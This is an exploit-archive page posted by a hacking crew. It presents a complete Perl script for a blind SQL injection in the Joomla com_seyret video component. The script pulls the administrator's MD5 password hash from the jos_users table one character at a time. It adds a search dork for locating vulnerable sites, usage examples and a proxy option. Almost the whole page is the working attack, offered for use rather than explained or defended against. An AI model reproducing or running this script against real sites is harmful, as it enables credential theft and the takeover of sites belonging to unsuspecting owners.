Joomla Component com_seyret Blind SQL Injection Vulnerabilit
Posted on 02 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_seyret Blind SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================= Joomla Component com_seyret Blind SQL Injection Vulnerability ============================================================= [+]Title :Joomla Component (com_seyret) Blind SQL Injection Exploit [+]Author :**RoAd_KiLlEr** [+]Contact :RoAd_KiLlEr[at]Khg-Crew[dot]Ws [+]Tested on :Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws [~] Home: http://a-h-crew.net [~] Vendor:http://joomlaholic.com/ [~] Download App:http://joomlaholic.com/downloads/2-seyret-video-component ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+]EXPLOIT: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { system("Title Albanian Hacking Crew"); print " "; print " ####################################################################### "; print " # Joomla Component (com_seyret) Blind SQL Injection Exploit "; print " # ----------------------------------------------------------- "; print " # Author: **RoAd_KiLlEr** "; print " # Greetz: Ton![W]indowS,X-n3t,b4cKd00r ~,DarkHacker.,The|DennY` "; print " # Site: www.a-h-crew.net "; print " # ----------------------------------------------------------- "; print " # Dork : inurl:com_seyret "; print " # Usage: perl exploit.pl host path <options> "; print " # Example: perl exploit.pl www.host.com /path/ -a 3 "; print " # ----------------------------------------------------------- "; print " # Options: "; print " # -a valid id "; print " ####################################################################### "; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $aid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "p=s", "a=i"); print "[~] Exploiting... "; if($options{"u"}) { $userid = $options{"u"}; } if($options{"a"}) { $aid = $options{"a"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print " [~] Exploiting done "; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $aid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php? option=com_seyret&task=videodirectlink&id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=".$h.""; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "Back"; if($content =~ /$regexp/) { return 1; } else { return 0; } } =========================================================================================== [!] Albanian Hacking Crew =========================================================================================== [!] **RoAd_KiLlEr** =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers =========================================================================================== [!] Spec Th4nks: Inj3ct0r.com & r0073r | indoushka from Dz-Ghost Team | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friendz =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN =========================================================================================== # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-02]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
